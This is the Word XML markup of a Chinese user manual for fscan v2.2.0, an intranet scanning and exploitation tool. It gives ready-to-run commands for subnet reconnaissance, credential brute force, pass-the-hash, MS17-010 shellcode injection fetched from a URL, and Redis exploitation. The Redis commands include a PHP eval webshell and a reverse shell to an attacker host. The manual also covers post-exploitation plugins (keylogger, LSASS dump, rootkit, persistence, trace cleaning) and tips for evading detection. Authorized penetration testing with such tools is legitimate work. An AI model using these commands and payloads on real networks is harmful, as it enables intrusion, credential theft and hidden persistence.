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 Light" w:hAnsi="Calibri Light"/>
          <w:b/>
          <w:color w:val="1A56DB"/>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>fscan 使用手册</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>内网综合扫描工具 — 命令行版 v2.2.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="320" w:after="320"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DEE2E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版本：2.2.0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生成日期：2026-08-10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平台：Windows x64</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="D03B3B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>⚠ 免责声明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="D03B3B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>本工具仅面向合法授权的企业安全建设行为。使用前请确保已获得授权，</w:t>
        <w:br/>
        <w:t>符合当地法律法规，不对非授权目标扫描。作者不承担任何非法使用产生的后果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="320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7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[ 请在 Word 中右键此处 → 更新域 以生成目录 ]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>简介</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>fscan 是一款基于 Go 语言编写的内网综合扫描工具，支持主机存活探测、端口扫描、服务识别、弱口令爆破、Web 指纹识别、漏洞扫描与利用、后渗透等功能。它被设计为"一键式"工具——默认参数即可完成从侦察到利用的完整链条。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>核心能力一览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37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主机发现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ICMP/Ping 存活探测，支持大网段 B/C 段存活统计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端口扫描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TCP 全连接扫描，内置约 140 个常用端口，支持端口组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服务识别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智能协议识别，20+ 种服务指纹匹配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探测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网站标题、CMS 指纹、Web 中间件、WAF/CDN 识别（40+ 指纹）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弱口令爆破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28 种服务爆破，内置 100+ 常见弱密码，支持 {user} 变量替换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Hash 碰撞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支持 NTLM Hash 认证（SMB/WMI）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 密钥登录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支持私钥认证方式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高危漏洞检测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MS17-010（永恒之蓝）、SMBGhost（CVE-2020-0796）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未授权访问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/ MongoDB / Memcached / Elasticsearch 等未授权检测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POC 扫描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集成 Web 漏洞 POC，支持 Xray POC 格式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DNSLog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支持 DNSLog 外带检测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利用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写公钥、写计划任务、写 WebShell、主从复制 RCE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MS17-010 利用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ShellCode 注入，支持添加用户、执行命令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本地插件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信息收集、凭据获取、权限维持、反弹 Shell、杀软检测、痕迹清理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>架构与工作流程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>fscan 的扫描流程分为六个阶段，依次执行：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目标输入 → 存活探测 → 端口扫描 → 服务识别 → 弱口令爆破 → 漏洞检测与利用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│           │          │          │            │              │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│      ICMP/Ping    TCP连接    指纹匹配    28种服务爆破    MS17-010/Redis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│      存活统计     约140端口   20+服务    内置字典+自定义   POC扫描/未授权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>关键设计点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• 每个阶段依赖上一阶段的结果：只有存活的主机才做端口扫描，只有开放端口才做服务识别。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• 爆破发生在服务识别之后，因此能精准选择爆破协议（SSH 端口才做 SSH 爆破）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• POC 扫描发生在 Web 指纹识别之后，通过指纹匹配合适的 POC，避免盲目全量发包。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• 可通过 -np（跳过存活探测）、-nobr（跳过爆破）、-nopoc（跳过 POC）跳过特定阶段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>快速开始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全模块扫描一个 C 段（最常用）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仅存活探测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192.168.1.0/24 -ao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指定端口扫描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192.168.1.1 -p 22,80,443,3389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禁用爆破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192.168.1.0/24 -nobr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Web 扫描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SSH 爆破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ssh -user root -pwd password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Redis 写公钥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redis -rf id_rsa.pub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本地插件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systeminfo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pP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随时运行 fscan_2.2.0_windows_x64.exe --help 查看最新参数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>完整参数表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>目标相关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25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目标：IP / CIDR网段 / IP范围 / 域名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 192.168.1.0/24</w:t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从文件读取目标列表（每行一个）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-hf targets.txt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排除指定主机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 192.168.1.1,192.168.1.254</w:t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从文件读取排除主机列表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-ehf exclude.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>目标格式支持：单IP (192.168.1.1)、CIDR网段 (192.168.1.0/24)、IP范围 (192.168.1.1-192.168.1.100)、域名 (example.com)、文件输入 (-hf ip.txt)。多个目标用逗号分隔。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>端口控制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约140个常用端口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指定端口列表</w:t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从文件读取端口列表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-ep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排除指定端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>扫描模式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623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all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扫描模式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765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all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全部模块（存活→端口→服务→爆破→POC）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icmp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ICMP 存活探测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portscan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仅端口扫描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SSH 扫描 + 爆破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mysql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MySQL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mssql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MSSQL 扫描 + 爆破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SMB 扫描 + MS17-010 检测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smb2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SMB Hash 碰撞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rdp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RDP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Redis 扫描 + 利用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ftp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FTP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postgresql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PostgreSQL 扫描 + 爆破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oracle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Oracle 扫描 + 爆破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mongodb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MongoDB 扫描 + 未授权检测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elasticsearch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ES 扫描 + 未授权检测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netbios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NetBIOS 信息探测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ms17010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 MS17-010 漏洞检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>性能与并发控制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386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600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端口扫描线程数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模块扫描线程数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-time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端口扫描超时（秒）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-wt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请求超时（秒）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-gt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180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全局超时（秒）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-rate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0（不限制）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每分钟最大发包次数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-maxpkts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0（不限制）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最大发包总数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-icmp-rate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float</w:t>
            </w:r>
          </w:p>
        </w:tc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0.1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ICMP 发包速率（约 1463 pps）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-num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POC 并发数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-retry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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="538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最大重试次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>调优建议：内网环境好时可加大 -t 1000；网络不稳定时降低至 -t 200 并增加 -time 5；规避流量检测时用 -rate 1000；VPN 环境下用 -t 200 -time 5。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>凭据与爆破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08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指定用户名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指定密码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额外用户名（逗号或空格分隔，与内置字典合并）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-pwda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额外密码（逗号或空格分隔，与内置字典合并）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-userf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用户名字典文件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-pwdf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密码字典文件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-upf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用户名:密码对文件（每行格式 user:pass）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-domain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域名（用于 SMB 域认证爆破）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-hash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NTLM 哈希值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-hashf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NTLM 哈希文件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-sshkey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 私钥文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>支持爆破的服务（28种）：SSH、RDP、SMB、FTP、Telnet、MySQL、MSSQL、Oracle、PostgreSQL、Redis、MongoDB、Elasticsearch、Memcached、VNC、LDAP、SMTP、POP3、IMAP、SNMP、Rsync、RabbitMQ、ActiveMQ、Kafka、Zookeeper、Neo4j、Cassandra、MQTT、Modbus 等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>功能开关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793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-np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跳过存活探测（假设目标均在线，直接扫端口）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-ntp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="793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 TCP 补充探测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-nsp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跳过网段预筛（大规模扫描时跳过空 /24 网段的优化）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-nobr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="793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跳过爆破（仅做扫描和服务识别）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-nopoc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 Web POC 扫描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-noredis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="793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跳过 Redis 漏洞利用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-full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全量 POC 扫描（遍历所有 POC，更全面但更慢）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-ao</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="793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仅存活探测（等价于 -m icmp）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Web 相关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66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目标 URL（单个 Web 扫描）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URL 列表文件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-cookie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HTTP Cookie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-ua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自定义 User-Agent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-wt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5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请求超时（秒）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-max-redirect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10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HTTP 最大重定向次数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-pocname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 POC 名称关键字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-pocpath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自定义 POC 脚本路径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-dns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启用 DNSLog 外带检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞利用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08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写入文件路径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-rs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计划任务反弹Shell (格式: ip:port)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-rwp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WebShell 写入路径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-rwc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WebShell 写入内容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-rwf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Redis WebShell 文件名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-sc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MS17-010 Shellcode 路径或 URL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-rsh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反弹Shell 目标地址 (格式: ip:port)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-fsh-port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正向Shell 监听端口 (默认 4444)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>本地后渗透插件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插件名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systeminfo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系统信息收集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reverseshell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反弹Shell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forwardshell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正向Shell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socks5proxy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启动SOCKS5代理服务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keylogger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键盘记录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minidump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LSASS凭据导出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sshkey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SSH公钥注入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cleaner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痕迹清理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crontask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Cron持久化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systemdservice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Systemd服务持久化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ldpreload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LD_PRELOAD Rootkit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Linux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winregistry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注册表持久化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winschtask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计划任务持久化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winservice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服务持久化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winstartup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启动项持久化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winlogon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登录脚本持久化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winwmi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WMI持久化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winbits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BITS任务持久化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winifeo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IFEO持久化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avdetect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杀软检测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Windows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download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文件下载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全平台</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>代理与网络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803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-proxy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HTTP 代理 (如: http://127.0.0.1:8080)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-socks5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SOCKS5 代理 (如: 127.0.0.1:1080 或 socks5://user:pass@127.0.0.1:1080)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-iface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指定本地网卡IP (VPN场景，如: 10.8.0.5)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-start-socks5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启动SOCKS5代理服务器 (如: 1080)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>输出与显示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481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-o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result.txt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输出文件路径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-f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txt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输出格式: txt / json / csv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不保存结果到文件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-silent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静默模式（无Banner、无进度条、无颜色）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-nocolor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禁用彩色输出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-nopg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禁用进度条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-debug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调试模式（日志写入 fscan_debug.log）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-log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base,info,success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日志级别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-perf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输出性能统计JSON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-lang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zh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语言: zh(中文) / en(英文)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>使用场景与示例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>场景 1：基础内网侦察</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>目标：快速了解一个网络的资产情况。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最常用命令：全模块扫描一个 C 段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仅存活探测（快速确认哪些主机在线）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192.168.1.0/24 -ao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仅端口扫描 + 不爆破 + 不POC（最轻量侦察）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192.168.1.0/24 -nobr -nopoc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 B 段（更大范围）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192.168.0.0/16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从文件批量导入目标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-hf targets.txt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排除特定主机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192.168.1.0/24 -eh 192.168.1.1,192.168.1.254</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>场景 2：指定端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>目标：只扫描关心的端口，加速扫描或针对性侦察。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只扫 Web 端口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192.168.1.0/24 -p 80,81,443,8080,8443,9090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只扫数据库端口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192.168.1.0/24 -p 3306,1433,5432,6379,27017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全端口扫描（1-65535，很慢，建议只对单台主机使用）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192.168.1.100 -p 1-65535 -t 1000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排除端口（不扫 445 和 3389）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192.168.1.0/24 -ep 445,3389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禁 Ping 环境（跳过 ICMP，直接用 TCP 扫端口）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192.168.1.0/24 -np</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>场景 3：弱口令爆破</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>目标：发现弱口令服务。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只扫描 + 爆破 SSH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192.168.1.0/24 -m ssh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指定用户名和密码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192.168.1.0/24 -user admin -pwd admin123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使用自定义字典文件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192.168.1.0/24 -userf users.txt -pwdf pass.txt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在内置字典基础上追加用户名和密码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192.168.1.0/24 -usera "root,admin,test" -pwda "123456,password,admin"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 用户名:密码 对文件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192.168.1.0/24 -upf creds.txt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SMB 域认证爆破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192.168.1.0/24 -m smb -domain corp.local -user administrator -pwd P@ssw0rd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禁用爆破（仅扫描和服务识别，不做任何登录尝试）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192.168.1.0/24 -nobr</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>场景 4：Web 漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>目标：扫描 Web 服务的指纹、标题和漏洞。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扫描单个 URL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http://192.168.1.100:8080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批量扫描 URL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-uf urls.txt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带 Cookie 扫描（适用于需要登录的站点）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http://192.168.1.100 -cookie "PHPSESSID=abc123; token=xyz"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 POC 名称（减少扫描量，更快更准）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http://192.168.1.100 -pocname weblogic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全量 POC 扫描（遍历所有POC，速度较慢但更全面）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http://192.168.1.100 -full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DNSLog 外带检测（适用于无回显漏洞）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-u http://192.168.1.100 -dns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>场景 5：漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>目标：利用已发现的漏洞。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Redis 写 SSH 公钥（实现免密登录）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redis -rf id_rsa.pub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Redis 计划任务反弹Shell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redis -rs 192.168.1.200:4444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Redis 写 WebShell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redis `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-rwp /var/www/html `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-rwc "&lt;?php @eval(${$}_POST[cmd]);?&gt;"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MS17-010 检测（永恒之蓝）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192.168.1.0/24 -m ms17010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检测到 MS17-010 后注入 Shellcode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192.168.1.100 -sc http://your-server/payload.bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>场景 6：凭据复用与哈希传递</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>目标：利用已获取的凭据横向移动。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NTLM Hash 传递（Pass-the-Hash）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`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-hash "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"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批量哈希传递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192.168.1.0/24 -hashf hashes.txt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SSH 私钥登录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192.168.1.100 -m ssh -user root -sshkey id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>场景 7：后渗透与本地插件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>目标：在已控制的主机上执行后渗透操作。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列出所有可用本地插件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list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收集系统信息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systeminfo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反弹 Shell（先在攻击机监听: nc -lvnp 4444）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reverseshell -rsh 192.168.1.200:4444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启动 SOCKS5 代理（本地监听 1080，用于内网穿透）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socks5proxy -start-socks5 1080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LSASS 凭据导出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minidump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杀软检测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avdetect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Windows 启动项持久化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winstartup -win-pe C:\Windows\Temp\payload.exe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清理痕迹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-local cleaner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>场景 8：代理与网络控制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>目标：通过代理扫描或控制流量特征。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 HTTP 代理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10.0.0.0/24 -proxy http://127.0.0.1:8080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 SOCKS5 代理（无认证）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10.0.0.0/24 -socks5 127.0.0.1:1080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 SOCKS5 代理（带认证）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10.0.0.0/24 -socks5 socks5://user:pass@127.0.0.1:1080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VPN 场景：指定网卡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10.8.0.0/24 -iface 10.8.0.5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限制发包速率（每分钟最多 1000 个包，规避检测）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192.168.1.0/24 -rate 1000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调整 ICMP 速率（降低到 0.05 更隐蔽）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192.168.1.0/24 -icmp-rate 0.05</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>场景 9：输出格式控制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>目标：控制结果的输出格式和内容。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指定输出文件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192.168.1.0/24 -o scan-2026-08-10.txt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JSON 格式输出（方便程序解析）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192.168.1.0/24 -f json -o result.json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CSV 格式输出（方便 Excel 打开）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192.168.1.0/24 -f csv -o result.csv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不保存文件（仅屏幕显示）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192.168.1.0/24 -no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静默模式（适合 Cobalt Strike 等不出网场景）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192.168.1.0/24 -silent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调试模式（排查问题时使用，日志写入 fscan_debug.log）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192.168.1.100 -debug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输出性能统计（了解各阶段耗时）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192.168.1.0/24 -perf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>结果解读指南</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>result.txt 输出格式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>典型的扫描结果文件分为五个部分：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===== 存活主机 =====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192.168.9.106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192.168.9.101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===== 开放端口 =====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192.168.9.101:80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192.168.9.101:22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===== 服务信息 =====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192.168.9.101:22 ssh SSH-2.0-dropbear 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192.168.9.101:80 http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192.168.9.106:445 microsoft-ds SMB@ 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http://192.168.9.108:8080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===== Web服务 =====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http://192.168.9.108:8080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https://192.168.9.108:443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...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===== 漏洞信息 =====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[+] 192.168.9.106:445 MS17-010 (Windows Server 2008 R2)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[+] 192.168.9.101:6379 Redis 未授权访问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[+] 192.168.9.101:22 SSH root:root 弱口令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>各节含义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节</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4252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关键符号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存活主机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所有响应 ICMP/Ping 的主机，代表了可攻击面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开放端口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IP:端口 格式，快速了解每台主机的服务分布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服务信息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每个开放端口对应的服务协议和版本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@ = 指纹已识别；version bind = DNS 版本可查；unknown = 未识别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服务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汇总所有 HTTP/HTTPS 服务 URL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方便后续针对性测试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漏洞信息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发现的漏洞，以 [+] 开头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包含目标地址、端口和漏洞描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>最佳实践</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>侦察阶段（信息收集为主）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第一步：轻量探测，了解网络规模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10.0.0.0/8 -m icmp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第二步：对存活网段做全模块扫描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192.168.9.0/24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第三步：对关键主机做全端口扫描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192.168.9.106 -p 1-65535</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>横向移动阶段（爆破和利用为主）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发现弱口令后，用已获凭据在全网横向爆破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192.168.0.0/16 -user admin -pwd Admin@123 -nopoc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使用哈希传递横向移动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192.168.0.0/16 -hashf captured-hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>规避检测（隐蔽优先）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fscan 限速模式：低线程 + 限速 + 低 ICMP 速率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192.168.1.0/24 -t 100 -rate 500 -icmp-rate 0.05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代理链扫描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.\fscan_2.2.0_windows_x64.exe -h 10.0.0.0/24 -socks5 127.0.0.1:1080 -t 100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>参数组合速查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65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命令模板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最常用全扫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轻量侦察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192.168.1.0/24 -nobr -nopoc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快速存活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192.168.0.0/16 -ao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指定服务端口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192.168.1.0/24 -p 22,80,443,3306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仅爆破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192.168.1.0/24 -np -nopoc -user admin -pwd admin123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隐蔽扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="765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192.168.1.0/24 -t 100 -rate 500 -silent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输出 JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="765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fscan -h 192.168.1.0/24 -f json -o result.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>参考资料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• fscan GitHub 官方仓库：https://github.com/shadow1ng/fscan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• 404StarLink 项目页：https://github.com/knownsec/404StarLink</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• FingerprintHub 指纹库：https://github.com/0x727/FingerprintHub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="DEE2E8"/>
        </w:pBdr>
      </w:pP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本工具是专业安全评估工具，请在获得合法授权的前提下使用。禁止对未授权目标进行扫描，使用者需自行承担所有法律责任。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5"/>
      </w:rPr>
      <w:t>fscan 使用手册</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6B7280"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve">  |  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="6B7280"/>
        <w:sz w:val="15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B7280"/>
        <w:sz w:val="15"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="6B7280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7A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Char"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="333333"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Blockquote">
    <w:name w:val="Blockquote"/>
    <w:pPr>
      <w:spacing w:before="80" w:after="80"/>
      <w:ind w:left="567"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:i/>
      <w:color w:val="6B7280"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Note">
    <w:name w:val="Note"/>
    <w:pPr>
      <w:spacing w:before="80" w:after="80"/>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="856304"/>
      <w:sz w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC1">
    <w:name w:val="TOC 1"/>
    <w:pPr>
      <w:spacing w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC2">
    <w:name w:val="TOC 2"/>
    <w:pPr>
      <w:spacing w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="18"/>
